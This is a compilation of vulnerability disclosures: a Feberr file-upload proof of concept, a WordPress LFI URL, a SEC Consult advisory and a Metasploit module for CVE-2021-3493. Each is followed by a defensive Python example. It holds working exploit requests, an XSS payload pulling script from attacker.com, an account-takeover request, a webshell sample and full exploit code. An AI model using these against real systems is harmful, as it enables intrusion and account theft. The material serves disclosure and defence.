<pre><code># Exploit Title: Feberr - Multivendor Digital Products Marketplace arbitrary file upload<br /># Version: 12.7<br /># Google Dork: N/A<br /># Date: 24/01/2022<br /># Exploit Author: Sohel Yousef - sohel.yousef@yandex.com<br /># Software Link: https://www.codester.com/items/14224/feberr-multivendor-digital-products-marketplace<br /># Software Link 2: https://www.codecanor.com/product/feberr-multivendor-digital-products-marketplace/<br /># Software Demo: https://overtasks.com/demo/feberr<br /># Category: webapps<br /><br />Feberr - Multivendor Digital Products Marketplace contains an arbitrary file upload vulnerability.<br />A registered vendor can upload .php files through the TinyMCE editor in the edit-item section by intercepting the upload request (for example with Burp Suite) and editing the raw request.<br /><br />Details<br /><br />Register as a vendor on the system, then add or edit an item; the item details section uses TinyMCE.<br />Direct link:<br />https://localhost/feberr/edit-item/<br /><br />Upload an image through the editor and intercept the resulting request:<br /><br />POST /demo/feberr/upload HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0<br />Accept: */*<br />Accept-Language: ar,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------429310566417994448462725662126<br />Content-Length: 179156<br />Origin: https://overtasks.com<br />Connection: close<br />Referer: https://localhost /demo/feberr/edit-item/PFRLZAmzwdWFNWnlgxUaxbLIO<br />Cookie: XSRF-TOKEN=eyJpdiI6InNxSGJaQjZ0UDYzamhnT2lXL09FWmc9PSIsInZhbHVlIjoiOEZCSVBnL3orczdpc2p4RE40ZmhlWCtKck1UNURET2EwWTdyeEtDVUR0Q1pMa2RLSXphSjNTbWJnRVlNS3Jld1U2d1lucWRNMDg1RVUybWdXTlMzMDAzUHcrdjNiM0IyWXRDbk01dzJJZU0zK3ZOWFlVM2JkTFRTZzdMMGhmN1UiLCJtYWMiOiIzYzU2ZTFkNThjZGQ5ZTI0ZWNiNzUzNWEyM2E4ZTk0OTZlZWYzMDc2NDAxOWU5NjZhNjkzNzQ5ZTIzMTA2NGRjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNKa1RRUHgvVStWYy85MkNuVFI2RlE9PSIsInZhbHVlIjoiUk8vMWMrS0NNLzczUWdSdFBnck1sSmdzVUhkckdQYUtORlczSGFDNWRJN1MvbGx0VGFNUkVCTS9jb1I3L25PbkdBc29hODltMXVTTVlxQVlIQ1FSaWtmVWwzWkNYVUlOQUk2Q04zbmwxdzRSQXdiRTF4WVhTTy9IaWp0V2dwM0UiLCJtYWMiOiIzMDY1ODI4ODkwZTczNjJkNjZhYmE3YjJiZWFiNzA0ODNhNTdmY2RkYjFhMmFlODQ3MTg1OTAyMDFiNWM1NjMwIiwidGFnIjoiIn0%3D<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />-----------------------------429310566417994448462725662126<br />Content-Disposition: form-data; name="file"; filename="blobid1643057738041.jpg" >>>>>>>>>>>>>>> CHANGE THIS TO .php<br />Content-Type: image/jpeg<br /><br />After the upload, TinyMCE shows the direct link to the uploaded file.<br /></code></pre>
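A server-side check that would have rejected the renamed upload above, as an added example that is not Feberr's code: the filename, its extension and the Content-Type in the multipart request are all chosen by the attacker, so the decision is made from an extension allowlist, the file's magic bytes and a scan for PHP tags, and the file is stored under a server-generated name. Python is assumed for the demonstration; the accepted formats, the sample JPEG header and the webshell bytes are constructed.

```python
"""Upload validation that rejects the renamed-.php trick from the request above.

Added example, not Feberr's code. Everything the client sends about the file
(filename, extension, Content-Type) is attacker-controlled, so the decision
is made from an extension allowlist, the file's magic bytes and a scan for PHP
tags, and the file is stored under a server-generated name. Formats and sample
bytes below are constructed for the demonstration.
"""
import os
import secrets
from typing import Tuple

ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
EXECUTABLE_EXT = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}

# Leading bytes a real file of each allowed type must start with.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def validate_upload(filename: str, content_type: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason). The client-supplied name and type are hints only."""
    # Strip any path component so "../../shell.jpg" cannot escape the upload dir.
    base = os.path.basename(filename.replace("\\", "/"))
    if not base or base.startswith("."):
        return False, "empty or hidden filename"
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[-1]:
        return False, "missing extension"
    ext = parts[-1]
    if ext not in ALLOWED_EXT:
        return False, f"extension .{ext} is not on the allowlist"
    # shell.php.jpg: AddHandler-style Apache configs execute on any .php segment.
    if EXECUTABLE_EXT.intersection(parts[:-1]):
        return False, "executable extension inside the filename"
    if not content_type.lower().startswith("image/"):
        return False, "Content-Type is not an image type"
    if not any(data.startswith(magic) for magic in MAGIC[ext]):
        return False, "file content does not match the declared image format"
    # Defence in depth against image/PHP polyglots served through a PHP handler.
    if b"<?php" in data or b"<?=" in data:
        return False, "PHP open tag found in file body"
    return True, "ok"


def stored_name(filename: str) -> str:
    """Server-chosen name for an already validated upload: random token plus extension."""
    ext = filename.lower().rsplit(".", 1)[-1]
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    jpeg = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32   # constructed JPEG header
    webshell = b"<?php system($_GET['c']); ?>"                  # constructed payload
    for name, ctype, body in [
        ("blobid1643057738041.php", "image/jpeg", jpeg),     # the PoC: renamed to .php
        ("blobid1643057738041.jpg", "image/jpeg", jpeg),     # legitimate upload
        ("shell.php.jpg", "image/jpeg", jpeg),               # double extension
        ("shell.jpg", "image/jpeg", webshell),               # wrong magic bytes
        ("poly.jpg", "image/jpeg", jpeg[:4] + webshell),     # image/PHP polyglot
    ]:
        ok, why = validate_upload(name, ctype, body)
        print(f"{name:28} {'ACCEPT' if ok else 'REJECT':6} {why}")
```

The magic-byte and tag checks are defence in depth; the controls that actually close the hole are the allowlist on the final extension, the rejection of an executable segment anywhere in the name, and storing under a name the client never chose, ideally in a directory the web server is configured not to execute from.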
<pre><code># Exploit Title: WordPress Plugin All-in-One Video Gallery plugin 2.4.9 - Local File Inclusion (LFI)<br /># Exploit Author: Mohamed Magdy Abumusilm Aka m19o<br /># Software: All-in-One Video Gallery plugin<br /># Version: <= 2.4.9<br /># Tested on: Windows, Linux<br /><br />PoC: https://example.com/wordpress/wp-admin/admin.php?page=all-in-one-video-gallery&tab=../../../../../poc<br /><br />Description: An authenticated user can exploit an LFI vulnerability in the tab parameter.<br /><br />Vulnerable code block: https://i.ibb.co/hXRcSQp/1123.png<br /><br />You can find a writeup on my blog: https://m19o.github.io/posts/How-i-found-my-first-0day/<br /><br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220202-0 ><br />=======================================================================<br /> title: Broken access control & Cross-Site Scripting<br /> product: Shopmetrics Mystery Shopping Software<br /> vulnerable version: SaaS platform before v21-11<br /> fixed version: SaaS platform v21-11<br /> CVE number: n/a for SaaS<br /> impact: Critical<br /> homepage: https://www.shopmetrics.com/<br /> found: 2021-05-06<br /> by: D. Zalmanov (Office Moscow)<br /> A. Vodyasov (Office Moscow)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Founded in 2004, Shopmetrics is a company that offers technology platform<br />solutions to mystery shopping and market research providers worldwide. Today<br />Shopmetrics is a global organization with offices in North America and Europe.<br />With over 80 full-time, dedicated developers and product specialists we are<br />committed to providing technology that is the industry benchmark in mystery<br />shopping and market research."<br /><br />Source: https://shopmetrics.com/Company.asp<br /><br /><br />Business recommendation:<br />------------------------<br />The solution is provided as software as a service. 
The current version as of v21-11<br />already contains the fix and all users should be protected.<br /><br />An in-depth security analysis performed by security professionals is highly<br />advised, as the software may be affected by further security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Reflected cross-site scripting<br />A reflected cross-site scripting vulnerability was identified in<br />various input fields of the application. By exploiting it, an attacker is able<br />to perform actions in the context of the attacked user.<br /><br /><br />2) Broken Access Control<br />Users of the web application are required to supply a username and password<br />combination in order to log in. This identification mechanism ensures that only<br />those who possess the proper credentials are able to log in to the application,<br />while unauthorized users cannot.<br /><br />A user who has forgotten or misplaced their password is able to request that<br />their password be reset by supplying a valid email address.<br /><br />Therefore, it is of the utmost importance to ensure that unauthorized users –<br />whether accidentally or intentionally – will not be able to step outside the scope<br />of their permission boundaries. 
This means, inter alia, that the application's authorization logic must<br />not be manipulable by client-side input and must be confined to<br />parameters defined solely by the server.<br /><br />Due to flaws in the authorization scheme, an authorization bypass<br />vulnerability gives an attacker access to the restricted password reset<br />functionality. An attacker who knows a valid email address can thereby reset<br />any password and hijack the corresponding user account.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Reflected cross-site scripting<br />The request to create a new user looks like the following:<br /><br />-------------------------------------------------------------------------------<br />POST /document.asp?alias=mystadministration.user.manage HTTP/2<br />[...]<br /><br />CreateUser_mode=INSERT_COMMIT&PCmsFormID=CreateUser&securityuserobjectid=&type=&Login=&password=password%21&<br />firstname=xyz&lastname=xyz&companyname=xyz&gender=M&address1=xyz&address2=xyz&city=xyz&<br />state_region=BD&country=GB&language=en-us&postalcode=12312&phonehome=2131221321321&phonework=2132132121321&<br />phonemobile=32132121321&fax=213321321321&email=user%40victim.com&timezone=27&defaultWelcomePage=&isdisabled=N<br />-------------------------------------------------------------------------------<br /><br />In a live attack scenario the following JavaScript code (payload.js) is hosted on the<br />attacker's server; it replays the user-creation request with the victim's session.<br /><br />-------------------------------------------------------------------------------<br />var data="CreateUser_mode=INSERT_COMMIT&PCmsFormID=CreateUser&securityuserobjectid=&type=&Login=&password=password%21&"+<br />"firstname=xyz&lastname=xyz&companyname=xyz&gender=M&address1=xyz&address2=xyz&"+<br />"city=xyz&state_region=BD&country=GB&language=en-us&postalcode=12312&phonehome=2131221321321&"+<br />"phonework=2132132121321&phonemobile=32132121321&fax=213321321321&email=user%40victim.com&"+<br />"timezone=27&defaultWelcomePage=&isdisabled=N";<br />var url="https://shopmetricshost/document.asp?alias=mystadministration.user.manage";<br />var http=new XMLHttpRequest();<br /><br />http.open('POST', url, true);<br />http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');<br />http.send(data);<br />-------------------------------------------------------------------------------<br /><br />When the logged-in victim opens the following link, the script is executed<br />in the victim's browser and the new user is created.<br /><br />-------------------------------------------------------------------------------<br />https://shopmetricshost/open/data.asp?post={%22action%22:%22exec%22,%22dataset%22:<br />{%22datasetname%22:%22/System/Platform/Globalization/LiteralsGetTranslations%22,%22dataformat%22:%22simple%22,%22datafieldproperties%22:{%22columns%22:[%22name%22]}},<br />%22parameters%22:[{%22name%22:%22LiteralIDs%22,<br />%22value%22:%22XXX%3C%3E%3Chtml%3E%3Cscript+src%3dhttps%3a//attacker.com%3a4443/payload.js%3E%3C/script%3E%3C/html%3EYYY%22}]}<br />-------------------------------------------------------------------------------<br /><br /><br />2) Broken Access Control<br />There is a password reset functionality in the application. 
The following request is<br />sent when the user tries to reset the password.<br /><br />-------------------------------------------------------------------------------<br />POST /open/data.asp HTTP/2<br />[...]<br /><br />post={"action"%3a"getdata","dataset"%3a{"datasetname"%3a"/System/Platform/Entities/EntityExecuteActionV2",<br />"dataformat"%3a"simple","datafieldproperties"%3a{"columns"%3a["name"]}},<br />"parameters"%3a[{"name"%3a"SecurityObjectUserID","value"%3anull},{"name"%3a"Action","value"%3a"U"},<br />{"name"%3a"EntityName","value"%3a"ChangePassword"},{"name"%3a"EntityInstanceID","value"%3anull},<br />{"name"%3a"ViewStateEventLogAddChunk","value"%3a"¬H¬2¬¬S¬1619442013259¬ ¬aa¬¬2021-04-13_11%3a21%3a¬- ¬P¬¬34|<br />BEBC7966-668A-4AC6-B3DE-1180EB3F8704¬S¬0¬- ¬F¬2¬9543¬S¬1¬- ¬I¬¬¬S¬2¬- D¬B¬0¬1¬V-6¬- D¬y¬¬user%40victim.com¬T¬0¬- D¬q.D¬1¬0¬T¬1¬- F¬S¬1¬0¬¬0¬- <br />F¬C¬1¬0¬T¬0¬- x¬S¬1¬0¬¬1¬- x¬C¬1¬0¬T¬0¬- XYZ¬V¬0¬3¬¬101¬- y¬y¬¬newpass¬U¬15162¬- y¬B¬0¬1¬V¬13¬- z¬y¬¬newpass¬U¬5983¬- <br />z¬B¬0-1¬V¬3¬-"},{"name"%3a"EntityAttachmentsList","value"%3anull},{"name"%3a"MiscSettings","value"%3a"[NOREAD][MISC_TOKEN%3aD196E12C550147DEB073F4A1C64EF782B25746008F334B36A6F35A0929AD98DB]"}]}<br />-------------------------------------------------------------------------------<br /><br />There is no integrity check of the parameters of this request. Therefore, an attacker<br />can supply any email to this request and the password of the account, which is connected<br />to the supplied e-mail, will be changed to the password value controlled by an attacker. 
For example, the following request changes the password of the administrator<br />account with the e-mail address admin@victim.com:<br /><br />-------------------------------------------------------------------------------<br />POST /open/data.asp HTTP/2<br />[...]<br /><br />post={"action"%3a"getdata","dataset"%3a{"datasetname"%3a"/System/Platform/Entities/EntityExecuteActionV2",<br />"dataformat"%3a"simple","datafieldproperties"%3a{"columns"%3a["name"]}},"parameters"%3a[{"name"%3a"SecurityObjectUserID","value"%3anull},{"name"%3a"Action","value"%3a"U"},{"name"%3a"EntityName","value"%3a"ChangePassword"},<br />{"name"%3a"EntityInstanceID","value"%3anull},{"name"%3a"ViewStateEventLogAddChunk","value"%3a"¬H¬2¬¬S¬1619442013259¬ ¬aa¬¬2021-04-13_11%3a21%3a15¬¬0¬- <br />¬ab¬-Mozilla/5.0+(Windows+NT+10.0%3b+Win64%3b+x64%3b+rv%3a88.0)+Gecko/20100101+Firefox/88.0¬¬1¬- ¬P¬¬34|<br />BEBC7966-668A-4AC6-B3DE-1180EB3F8704¬S¬0¬- ¬F¬2¬9543¬S¬1¬- ¬I¬¬¬S¬2¬- D¬B¬0¬1¬V-6¬- D¬y¬¬admin%40victim.com¬T¬0¬- D¬q.D¬1¬0¬T¬1¬- F¬S¬1¬0¬¬0¬- <br />F¬C¬1¬0¬T¬0¬- x¬S¬1¬0¬¬1¬- x¬C¬1¬0¬T¬0¬- XYZ¬V¬0¬3¬¬101¬- y¬y¬¬AttackerPassword¬U¬15162¬- y¬B¬0¬1¬V¬13¬- z¬y¬-AttackerPassword¬U¬5983¬- <br />z¬B¬0¬1¬V¬3¬-"},{"name"%3a"EntityAttachmentsList","value"%3anull},<br />{"name"%3a"MiscSettings","value"%3a"[NOREAD][MISC_TOKEN%3aD196E12C550147DEB073F4A1C64EF782B25746008F334B36A6F35A0929AD98DB]"}]}<br />-------------------------------------------------------------------------------<br /><br />After this request, the attacker can log in as the admin user with the<br />password "AttackerPassword".<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />No version number is available as the solution is provided as software as a service (SaaS).<br />The product was affected by the vulnerability during the timeframe of the test and until<br />it was fixed later in 2021.<br /><br /><br />Vendor contact timeline:<br />------------------------<br />The vendor was contacted through a third
party. The vendor confirmed on 7th<br />December 2021 that the advisory could be published.<br /><br /><br />Solution:<br />---------<br />The solution is provided as software as a service. The current version as of v21-11<br />contains the fix and all users should be protected.<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF D. Zalmanov, A. Vodyasov / @2022<br /><br /><br /></code></pre>
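The password-reset flaw in the advisory above comes down to the server taking both the target e-mail address and the new password from a client-built ViewState blob it never verifies. The following is an added example, not Shopmetrics code, of a reset flow in which the target account is fixed server-side: the server issues an HMAC-signed, expiring, single-use token to the mailbox owner, and the reset handler takes the account from the verified token, so nothing the client claims about the e-mail address is used. The secret, the user store and the sha256 password hashing are constructed for the demonstration; a real deployment would load the secret from configuration and use a password hash such as argon2 or bcrypt.

```python
"""Password reset whose target account is fixed server-side.

Added example, not Shopmetrics code. The server issues an HMAC-signed,
expiring, single-use token that is delivered only to the mailbox; the reset
handler changes the password of the account named inside the *verified*
token and ignores any e-mail the client supplies. Secret, user store and
sha256 hashing are constructed for the demo (use argon2/bcrypt in practice).
"""
import base64
import hashlib
import hmac
import json
import time
from typing import Dict, Optional, Set

SECRET = b"server-side-secret-rotate-me"   # assumption: from server config in practice
TOKEN_TTL = 15 * 60                        # seconds

USERS: Dict[str, str] = {                  # constructed user store: e-mail -> password hash
    "user@victim.com": hashlib.sha256(b"old").hexdigest(),
    "admin@victim.com": hashlib.sha256(b"old-admin").hexdigest(),
}
USED_TOKENS: Set[str] = set()


def _b64(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_reset_token(email: str, now: Optional[float] = None) -> Optional[str]:
    """Forgotten-password step. The token is only ever mailed to the address, so
    presenting it later proves control of that mailbox. The HTTP response should
    look identical whether or not the address exists."""
    if email not in USERS:
        return None
    payload = json.dumps({"email": email, "exp": int((now or time.time()) + TOKEN_TTL)}).encode()
    mac = hmac.new(SECRET, payload, hashlib.sha256).digest()
    return _b64(payload) + "." + _b64(mac)


def reset_password(token: str, new_password: str, now: Optional[float] = None) -> bool:
    """Change the password of the account named in a verified token only."""
    try:
        enc_payload, enc_mac = token.split(".", 1)
        payload, mac = _unb64(enc_payload), _unb64(enc_mac)
    except ValueError:
        return False
    if not hmac.compare_digest(mac, hmac.new(SECRET, payload, hashlib.sha256).digest()):
        return False                        # tampered: e-mail or expiry was changed
    if token in USED_TOKENS:
        return False
    claims = json.loads(payload)
    if claims["exp"] < (now or time.time()):
        return False
    USED_TOKENS.add(token)
    USERS[claims["email"]] = hashlib.sha256(new_password.encode()).hexdigest()
    return True


def check_password(email: str, password: str) -> bool:
    return hmac.compare_digest(USERS.get(email, ""), hashlib.sha256(password.encode()).hexdigest())


def tamper(token: str, email: str) -> str:
    """What the advisory's attacker does: swap the e-mail, keep everything else."""
    enc_payload, enc_mac = token.split(".", 1)
    claims = json.loads(_unb64(enc_payload))
    claims["email"] = email
    return _b64(json.dumps(claims).encode()) + "." + enc_mac


if __name__ == "__main__":
    token = issue_reset_token("user@victim.com")
    print("forged reset of admin:", reset_password(tamper(token, "admin@victim.com"), "AttackerPassword"))
    print("genuine reset of user:", reset_password(token, "newpass"))
    print("admin keeps old password:", check_password("admin@victim.com", "old-admin"))
```

The point is where the e-mail address comes from: in the vulnerable request it is a field the client writes; here it is a claim the server signed, and the MAC check runs before the claims are even parsed.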
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br /> Rank = GreatRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Post::Linux::Priv<br /> include Msf::Post::Linux::System<br /> include Msf::Post::Linux::Compile<br /> include Msf::Post::Linux::Kernel<br /> include Msf::Post::File<br /> include Msf::Exploit::EXE<br /> include Msf::Exploit::FileDropper<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => '2021 Ubuntu Overlayfs LPE',<br /> 'Description' => %q{<br /> This module exploits a vulnerability in Ubuntu's implementation of overlayfs. The<br /> vulnerability is the result of failing to verify the ability of a user to set the<br /> attributes in a running executable. Specifically, when Overlayfs sends the set attributes<br /> data to the underlying file system via `vfs_setxattr`, it fails to first verify the data<br /> by calling `cap_convert_nscap`.<br /> This vulnerability was patched by moving the call to `cap_convert_nscap`<br /> into the `vfs_setxattr` function that sets the attribute, forcing verification every time the<br /> `vfs_setxattr` is called rather than trusting the data was already verified.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'ssd-disclosure',<br /> 'bwatters-r7' # Aka @tychos_moose, Metasploit Module<br /> ],<br /> 'DisclosureDate' => '2021-04-12',<br /> 'Platform' => [ 'linux' ],<br /> 'SessionTypes' => [ 'shell', 'meterpreter' ],<br /> 'Privileged' => true,<br /> 'References' => [<br /> [ 'CVE', '2021-3493' ],<br /> [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-overlayfs-pe/' ],<br /> [ 'URL', 'https://github.com/briskets/CVE-2021-3493' ]<br /> ],<br /> 'Notes' => {<br /> 'Reliability' => [ REPEATABLE_SESSION ],<br /> 'Stability' => [ ],<br /> 'SideEffects' => [ 
ARTIFACTS_ON_DISK ]<br /> },<br /> 'Targets' => [<br /> [<br /> 'x86_64',<br /> {<br /> 'Arch' => [ ARCH_X64 ]<br /> }<br /> ],<br /> [<br /> 'aarch64',<br /> {<br /> 'Arch' => [ ARCH_AARCH64 ]<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0<br /> )<br /> )<br /> register_options [<br /> OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])<br /> ]<br /> register_advanced_options [<br /> OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])<br /> ]<br /> end<br /><br /> def check<br /> arch = kernel_hardware<br /><br /> unless arch.include?('x86_64') || arch.include?('aarch64')<br /> return CheckCode::Safe("System architecture #{arch} is not supported")<br /> end<br /><br /> release = kernel_release<br /> version = kernel_version<br /><br /> unless userns_enabled?<br /> return CheckCode::Safe('Unprivileged user namespaces are not permitted')<br /> end<br /><br /> vprint_good('Unprivileged user namespaces are permitted')<br /><br /> # If the target is Ubuntu...<br /> unless version =~ /[uU]buntu/<br /> return CheckCode::Safe('Target is not Ubuntu!')<br /> end<br /><br /> version_array = release.split('-')<br /> if version_array.length < 2<br /> fail_with(Failure::UnexpectedReply, 'The target Ubuntu server does not have the expected kernel version format!')<br /> end<br /> vprint_status("Version array: #{version_array}")<br /> major_version = Rex::Version.new(version_array[0])<br /> vprint_status("major_version: #{major_version}")<br /> minor_version = version_array[1]<br /> vprint_status("minor_version: #{minor_version}")<br /> lower_bound_version = Rex::Version.new(3.13)<br /> upper_bound_version = Rex::Version.new(5.14)<br /> if major_version > upper_bound_version || major_version < lower_bound_version<br /> return CheckCode::Safe("The target version #{major_version} is outside the vulnerable version range #{lower_bound_version}-#{upper_bound_version}")<br /> end<br /><br /> return 
CheckCode::Appears<br /> end<br /><br /> def exploit<br /> if is_root? && !datastore['ForceExploit']<br /> fail_with(Failure::None, 'Session already has root privileges. Set ForceExploit to override.')<br /> end<br /> base_dir = datastore['WritableDir'].to_s<br /> unless writable?(base_dir)<br /> fail_with(Failure::BadConfig, "#{base_dir} is not writable")<br /> end<br /><br /> executable_name = ".#{rand_text_alphanumeric(5..10)}"<br /> exploit_dir = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"<br /> exploit_path = "#{exploit_dir}/#{executable_name}"<br /> if file_exist?(exploit_dir)<br /> fail_with(Failure::BadConfig, 'Exploit dir already exists')<br /> end<br /> mkdir(exploit_dir)<br /> register_dir_for_cleanup(exploit_dir)<br /><br /> # Upload exploit<br /> arch = kernel_hardware<br /> vprint_status("Detected architecture: #{arch}")<br /> if (arch.include?('x86_64') && payload.arch.first.include?('aarch')) || (arch.include?('aarch') && !payload.arch.first.include?('aarch'))<br /> fail_with(Failure::BadConfig, 'Host/payload Mismatch; set target and select matching payload')<br /> end<br /> if live_compile?<br /> vprint_status('Live compiling exploit on system...')<br /> upload_and_compile(exploit_path, exploit_source('CVE-2021-3493', 'cve_2021_3493.c'))<br /> else<br /> vprint_status 'Dropping pre-compiled exploit on system...'<br /> if arch.include?('x86_64')<br /> precompiled_binary = 'cve_2021_3493.x64.elf'<br /> vprint_status("Dropping pre-compiled exploit #{precompiled_binary} on system...")<br /> upload_and_chmodx exploit_path, exploit_data('CVE-2021-3493', precompiled_binary)<br /> elsif arch.include?('aarch64')<br /> precompiled_binary = 'cve_2021_3493.aarch64.elf'<br /> vprint_status("Dropping pre-compiled exploit #{precompiled_binary} on system...")<br /> upload_and_chmodx exploit_path, exploit_data('CVE-2021-3493', precompiled_binary)<br /> else<br /> fail_with(Failure::NoTarget, "Unknown architecture: '#{arch}'")<br /> end<br /><br /> end<br /> 
register_file_for_cleanup(exploit_path)<br /><br /> # Upload payload<br /> payload_path = "#{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"<br /> upload_and_chmodx(payload_path, generate_payload_exe)<br /><br /> # Launch exploit<br /> print_status('Launching exploit...')<br /> random_string = rand_text_alphanumeric(5..10)<br /> cmd_string = "#{exploit_path} #{payload_path} #{exploit_dir} #{random_string}"<br /> vprint_status("Running: #{cmd_string}")<br /> begin<br /> output = cmd_exec(cmd_string)<br /> vprint_status(output)<br /> rescue Error => e<br /> elog('Caught timeout. Exploit may be taking longer or it may have failed.', error: e)<br /> print_error("Exploit failed: #{e}")<br /> ensure<br /> # rmdir() fails here on mettle payloads, so I'm just shelling out the rm for the exploit directory.<br /> cmd_exec("rm -rf '#{exploit_dir}'")<br /> end<br /> end<br />end<br /></code></pre>
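To make the kernel side of the module's description concrete, here is an added example that is not the module's code and not the public exploit's: it builds the version-3 security.capability xattr value that the exploit writes to a file in the overlay's upper directory, and models the translation that cap_convert_nscap() performs and that overlayfs skipped before forwarding the bytes to vfs_setxattr on the lower filesystem. The struct layout is the kernel's vfs_ns_cap_data; the uid map, the capability set and the paths are constructed, and try_setxattr only shows the call the exploit makes (an unprivileged caller outside a user namespace gets EPERM, and non-Linux hosts get "unsupported").

```python
"""The security.capability value CVE-2021-3493 writes, and the check overlayfs skipped.

Added example; not the Metasploit module's or the public exploit's code.
Layout follows the kernel's struct vfs_ns_cap_data (include/uapi/linux/capability.h):
  __le32 magic_etc; struct { __le32 permitted; __le32 inheritable; } data[2]; __le32 rootid;
rootid is the uid, as seen from the writer's user namespace, whose namespace the
file capabilities are valid in. cap_convert_nscap() maps it into the filesystem's
user namespace before the value is stored; overlayfs passed the raw bytes through
to vfs_setxattr, so rootid=0 written by the fake root of an unprivileged user
namespace became capabilities valid for real root. Uid map and caps are constructed.
"""
import errno
import os
import struct
from typing import Dict, Optional

VFS_CAP_REVISION_3 = 0x03000000
VFS_CAP_FLAGS_EFFECTIVE = 0x000001
XATTR_NAME_CAPS = "security.capability"
CAP_DAC_OVERRIDE, CAP_SETGID, CAP_SETUID, CAP_SYS_ADMIN = 1, 6, 7, 21
FMT = "<IIIIII"   # magic, perm[0], inh[0], perm[1], inh[1], rootid: 24 bytes, little-endian


def cap_mask(*caps: int) -> int:
    return sum(1 << c for c in caps)


def build_nscap(permitted: int, inheritable: int, rootid: int, effective: bool = True) -> bytes:
    """Serialise a v3 blob the way the kernel reads it (64-bit sets split into two u32)."""
    magic = VFS_CAP_REVISION_3 | (VFS_CAP_FLAGS_EFFECTIVE if effective else 0)
    lo = 0xFFFFFFFF
    return struct.pack(FMT, magic, permitted & lo, inheritable & lo,
                       (permitted >> 32) & lo, (inheritable >> 32) & lo, rootid)


def parse_nscap(blob: bytes) -> dict:
    magic, p0, i0, p1, i1, rootid = struct.unpack(FMT, blob)
    return {
        "revision": magic & 0xFF000000,
        "effective": bool(magic & VFS_CAP_FLAGS_EFFECTIVE),
        "permitted": p0 | (p1 << 32),
        "inheritable": i0 | (i1 << 32),
        "rootid": rootid,
    }


def convert_nscap(blob: bytes, uid_map: Dict[int, int]) -> Optional[bytes]:
    """Model of cap_convert_nscap(): translate rootid from the writer's user
    namespace (uid_map: inner uid -> uid in the filesystem's namespace) and
    refuse the write when it does not map (the kernel returns -EINVAL)."""
    caps = parse_nscap(blob)
    if caps["revision"] != VFS_CAP_REVISION_3 or caps["rootid"] not in uid_map:
        return None
    return build_nscap(caps["permitted"], caps["inheritable"],
                       uid_map[caps["rootid"]], caps["effective"])


def try_setxattr(path: str, blob: bytes) -> str:
    """The call the exploit makes on a file in the overlay's upper dir.
    Returns "ok" or the errno name; unprivileged callers normally get EPERM."""
    if not hasattr(os, "setxattr"):
        return "unsupported"
    try:
        os.setxattr(path, XATTR_NAME_CAPS, blob)
        return "ok"
    except OSError as exc:
        return errno.errorcode.get(exc.errno, str(exc.errno))


if __name__ == "__main__":
    # Inside `unshare -Ur` the writer is uid 0 of a namespace mapped to, say, uid 1000.
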